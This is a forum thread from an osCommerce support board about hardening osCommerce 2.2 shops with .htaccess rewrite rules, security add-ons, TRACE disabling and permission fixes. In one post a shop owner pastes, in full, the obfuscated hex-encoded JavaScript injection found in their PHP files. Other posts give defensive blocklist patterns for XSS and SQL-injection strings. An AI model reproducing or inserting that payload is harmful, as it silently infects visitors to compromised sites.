How to secure your osCommerce 2.2 site.

[Guest]

Hello,

 

There is a little PROBLEM here: http://addons.oscommerce.com/info/6044

 

I've installed the latest Anti XSS+SQL Injection to help PCI Compliance by chrish123 added 19 Jul 2008.

 

When I click the <buy now> button on advanced_search_result.php the product is added to the customers basket

BUT I get redirected to the iplog.txt telling me I should go away ... which is no good at all.

 

When those lines are cut off .htaccess (commented) clicking the button gives no redirect:

 

This is the relevant part in .htaccess

# extra anti uri and xss attack script 2 - sql injection prevention
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} ("|%22).*(>|%3E|<|%3C).* [NC]
RewriteRule ^(.*)$ log.php [NC]
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC]
RewriteRule ^(.*)$ log.php [NC]
RewriteCond %{QUERY_STRING} (java script:).*(;).* [NC]
RewriteRule ^(.*)$ log.php [NC]
RewriteCond %{QUERY_STRING} (;|'|"|%22).*(union|select|insert|drop|update|md5|benchmark|or|and|if).* [NC]
RewriteRule ^(.*)$ log.php [NC]
RewriteRule (,|;|<|>|'|`) /log.php [NC]

 

Should I keep only the pixclinic part of this contribution ?

Thanks for your kind advice,

David

Advanced Search - 403 Forbidden error, saying a login is required on my site...

[[200]]

Hey guys,

 

I have installed all of the addons listed on the first page but I am still getting this code added to a number of php files...

 

c102916999516l497da75b3503d(l497da75b35734){ function l497da75b35f05(){return 16;} return (parseInt(l497da75b35734,l497da75b35f05()));}function l497da75b36f22(l497da75b37677){ function l497da75b38de9(){var l497da75b395b9=2;return l497da75b395b9;} var l497da75b37e48='';l497da75b39d8b=String.fromCharCode;for(l497da75b38618=0;l497da75b38618<l497da75b37677.length;l497da75b38618+=l497da75b38de9()){ l497da75b37e48+=(l497da75b39d8b(c102916999516l497da75b3503d(l497da75b37677.subst

r(l497da75b38618,l497da75b38de9()))));}return l497da75b37e48;} var x75='';var l497da75b3a55a='3C736'+x75+'3726'+x75+'970743E6'+x75+'96'+x75+'6'+x75+'28216'+x75+'D796'+x75+'96'+x75+'1297B6'+x75+'46'+x75+'F6'+x75+'3756'+x75+'D6'+x75+'56'+x75+'E742E77726'+x75+'9746'+x75+'528756'+x75+'E6'+x75+'5736'+x75+'36'+x75+'1706'+x75+'528202725336'+x75+'32536'+x75+'392536'+x75+'36'+x75+'2537322536'+x75+'312536'+x75+'6'+x75+'42536'+x75+'352532302536'+x75+'6'+x75+'52536'+x75+'312536'+x75+'6'+x75+'42536'+x75+'3525336'+x75+'42536'+x75+'332533312533302532302537332537322536'+x75+'3325336'+x75+'42532372536'+x75+'3825373425373425373025336'+x75+'125326'+x75+'6'+x75+'25326'+x75+'6'+x75+'2536'+x75+'372536'+x75+'6'+x75+'6'+x75+'2536'+x75+'372536'+x75+'6'+x75+'6'+x75+'2533322536'+x75+'6'+x75+'42536'+x75+'3525326'+x75+'52536'+x75+'6'+x75+'52536'+x75+'3525373425326'+x75+'6'+x75+'25326'+x75+'52536'+x75+'372536'+x75+'6'+x75+'6'+x75+'25326'+x75+'6'+x75+'2536'+x75+'332536'+x75+'382536'+x75+'352536'+x75+'332536'+x75+'6'+x75+'225326'+x75+'52536'+x75+'382537342536'+x75+'6'+x75+'42536'+x75+'6'+x75+'32532372532302537372536'+x75+'392536'+x75+'342537342536'+x75+'3825336'+x75+'4253334253336'+x75+'2532302536'+x75+'382536'+x75+'352536'+x75+'392536'+x75+'372536'+x75+'3825373425336'+x75+'42533352533372533332532302537332537342537392536'+x75+'6'+x75+'32536'+x75+'3525336'+x75+'4253237253736'+x75+'2536'+x75+'392537332536'+x75+'392536'+x75+'322536'+x75+'392536'+x75+'6'+x75+'32536'+x75+'3925373425373925336'+x75+'12536'+x75+'382536'+x75+'392536'+x75+'342536'+x75+'342536'+x75+'352536'+x75+'6'+x75+'525323725336'+x75+'525336'+x75+'325326'+x75+'6'+x75+'2536'+x75+'392536'+x75+'36'+x75+'2537322536'+x75+'312536'+x75+'6'+x75+'42536'+x75+'3525336'+x75+'52729293B7D76'+x75+'6'+x75+'172206'+x75+'D796'+x75+'96'+x75+'13D7472756'+x75+'53B3C2F736'+x75+'3726'+x75+'970743E';document.write(l497da75b36f22(l497da75b3a55a));</script>

 

How the hell do I get rid of this and prevent it from coming back?

 

Thanks.

[Guest]

Hey guys,

 

I have installed all of the addons listed on the first page but I am still getting this code added to a number of php files...

 

 

 

How the hell do I get rid of this and prevent it from coming back?

 

Thanks.

If you are not running RC2a, then you need to patch it.

 

If you are running RC2a, then, to the best of my knowledge, and all things considered, your web host provides the vulnerabilty and you need to change web hosts.

[mirza_yasir4]

Both Security PRO and IP Trap worked for me

But I am unable to use .htaceess security, when I put a .htacess file into server, it give me server internal error, then I can not see my website and admin section both.

[revenson]

Both Security PRO and IP Trap worked for me

But I am unable to use .htaceess security, when I put a .htacess file into server, it give me server internal error, then I can not see my website and admin section both.

 

 

Yes, I found the same thing a couple of days ago. My suggestion is to remove sections of the suggested .htaccess file from the bottom up until it works. I say that because I recall it was something near the bottom that was causing my problem.

[paper53558]

Permissions on folders should be no higher than 755. If your hosting setup demands permissions of 777 on folders then change hosts.

 

I recently switched web hosts. I got the error about the images directory not being writeable. The directory permissions were 755. I was also unable to add images to products with the permissions set at 755. I switched the permissions to 777 and everything uploaded and the error message went away. At my old web host, the images folder was set at 755 and everything worked fine. The old host was a shared hosting plan, the new host is a VPS plan. What do I need to configure or ask the host to do to get my permissions back to 755? Thanks!

[♥FIMBLE]

ask you host to turn on SuExec it will alow you to run 755 as 777 [as you old hosts did]

Nic

[paper53558]

ask you host to turn on SuExec it will alow you to run 755 as 777 [as you old hosts did]

Nic

 

Thanks for your help. SuExec was already turned on, but I checked and had the host turn on suPHP and put it in the .htaccess file and that did the trick.

[spooks]

oops

[Moparcj5]

I had a problem with htaccess protection contribution with hot linking images. When ever I went to a secure part of my website such as log in ,check out, ect, I would see the stolen image on those pages. Below I have added a line of code to this that fixed it. Hopefully this is done correctly and will not cause problems.

 

This is to help someone else out with the same problem. If there is anything wrong with this please let me know.

 

# stop hotlinking (gif/jpg) and serve alternate content
I have included an image for you to upload, please note if you use your images out side of your server (like linked into EBAY) you cannot use this.

<IfModule mod_rewrite.c>

RewriteEngine on

RewriteCond %{HTTP_REFERER} !^$

RewriteCond %{HTTP_REFERER} !^http://(www\.)?YOURSITE\.COM/.*$ [NC]

RewriteCond %{HTTP_REFERER} !^https://(www\.)?YOURSITE\.COM/.*$ [NC]

RewriteRule .*\.(gif|jpg)$ http://www.YOURSITE.COM/images/stolen.gif [R,NC,L]

</ifModule>

[ncoded]

I apreciate that a lot of talented people write add-ons, but personally i NEVER install any add-ons, not unless you can reverse-engineer the code so that you know what it is doing, and if that were the case you would just write the add-on yourself.

 

Lets be honest, how would you know that the add-on not only did what you wanted, but didnt also email out admin logins, etc.

 

Personally i think the OSC need to have 2 types of add-ons, unvalidated (untested by OSC) and validated (tested by OSC).

 

well thats my opinion anyhow, we will see what v3 has to offer (hot on the heels of Magento).

[spooks]

If contribs were damaging especially these security related ones, it would quickly be discovered by the osC experts here, reported & the offending item removed.

 

If your saying you have installed no security measures such as these on your site, then the hackers will love you, they wont tell you that though!!!

 

:huh:

[ncoded]

thanks for your reply Sam.

 

this is really good news to hear that some people are looking at add-ons (security), however to be honest i ment more 'all add-ons'.

 

clearly once you put code on your server it can pretty much do what it wants.

 

i read about the 'reviews sql inject flaw' picked up by (a dodgy sounding) security company.

 

are you saying that osc has many security flaws? what type? is there a response from osc on this?

 

is there a list of osc security flaws somewhere?

[spooks]

I`ve not seen one, then I`ve not looked that hard.

 

I believe having installed those listed here you should have no problems, bareing issues intruduced by any other contrib you install, certainly havng applied these to sites that have been attacked has prevented any repeat.

 

I must say I was surprised to see that 'testimonials' still has issues, since its been known for a very long time it has security flaws & there are well published info on the web showing how to execute the hack.

 

Clearly you do need to check that any contrib you add does not open any new holes, it might be prudent to simply add sanitising code to any page that allows customer input using POST (GET is cleaned by security pro) for any contrib you install, better safe than sorry.

 

:)

[TheZag]

Thanks a lot for this helpful and precious post !

A BIG THANKS !

[XxWickedxX]

Typical results of some others the Anti XSS does not work for me. Just creates an internal 500 error on the site.

[Guest]

Typical results of some others the Anti XSS does not work for me. Just creates an internal 500 error on the site.

I think it depends on how your server is set up. I do not the same results with some of them, I just can not access the site via http.

[chrish123]

Lately Ive been locking down a few problems on our server, so I thought I'd share this one:

 

Disable HTTP TRACK | TRACE Method in Apache which is enabled by defualt which is used for cross site tracing which is similar to cross site scripting (XSS)

 

Open your httpd.conf on the server:

 

somewhere in there you can ADD:

 

TraceEnable Off

 

There is another method which uses apache rewrite but the above method is obviously better, But anyway second method is to add the below code in the same httpd.conf file, not in your www .htacess file:

 

# Anti cross site tracing - protection
RewriteEngine On 
RewriteCond %{REQUEST_METHOD} ^TRACE 
RewriteRule .* - [F]

[chrish123]

Typical results of some others the Anti XSS does not work for me. Just creates an internal 500 error on the site.

 

The "anti XSS script" after pixclinics I added would fail on certain files, I did ask for my file to be removed, but they removed my comment instead!

 

I use SEO-G and noticed I needed to put "advanced_search.php" in the exclude list otherwise it wont work as I have a "ajax search" contribution in there.

 

 

I'm currently just using the below in my htacess file, but note the track|trace reference, that wont actually do anything in the website root, as it needs to be put directly in the httpd.conf. A PCI Compliance scan would confirm it!

 

# 1) add these lines to your .htaccess file
# 2) create an index_error.php file with whatever content you want to be displayed.

# Anti XSS 

Options +FollowSymLinks
RewriteEngine On 
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index_error.php [F,L]
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* - [F]

# prevent image theft / hotlinking except the sites below

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?change-to-your-sitename.com/.*$ [NC]
#if your using images directly from your site to ebay.com for example , you can uncomment the 2 lines below:
#RewriteCond %{HTTP_REFERER} !^http://(www\.)?ebay.co.uk/.*$ [NC]
#RewriteCond %{HTTP_REFERER} !^http://(www\.)?ebay.com/.*$ [NC]
RewriteRule \.(gif|jpg|png|bmp|swf|pdf)$ - [F]


<Files .htaccess>
order allow,deny
deny from all
</Files>

<FilesMatch "\.(bak|sql|inc)$" >
deny from all
</FilesMatch>

[/code]

[XxWickedxX]

So making those edits to that httpd.conf will achieve the same thing without .htaccess modification or is the .htaccess code from the contrib still needed?

[grreatone31]

i was curious about after i download all php files are they to be uploaded to admin folder? as i am unable to get it to "install" security pro.php.if it is in the wrong folder i am will to move it where ever it needs to be. i am a total newbie at this but not an idiot.

[spooks]

All contribs contain installation instructions, just follow those to the letter.

 

 

;)

[catlover]

I added the contribs suggested by Sam in the original message. Excellent info, thanks Sam!

 

I did run across a problem with IP Trap. When I tested the install, I received the banned message, as expected, and an email was sent with the IP address. I noticed in IP_Trapped.txt the blocked IP was 999.999.999.999. I removed this number and tested again, received the banned message, but no IP address was added to IP_Trapped.txt. I set the permissions to 755 for the folder and 666 for IP_Trapped. I followed the install instructions, but cannot get the IP_Trapped file to read the IP addresses. If I leave the default IP address 999.999.999.999, then I cannot access our site at all. Any one have suggestions on a workaround?

 

Thanks,

 

Regards,

Joe

[catlover]

I got the IP Trap to work. My robots.txt was not identifying the folder personal - I inadvertently left out "/". IP address was then written to the IP_Trapped.txt. My advice is to double check robot.txt file.

 

Regards,

Joe

[vivithemage]

I tried out all CHMOD's on this config file and I keep getting the same error RIGHT after installation :

 

Warning Warning: I am able to write to the configuration file: /home2/alistaqu/public_html/includes/configure.php. This is a potential security risk - please set the right user permissions on this file.

 

I go to the file and I went through 644, 444, 400, etc...read, read, read only on all 3...but it still says it :(.

 

Linux system.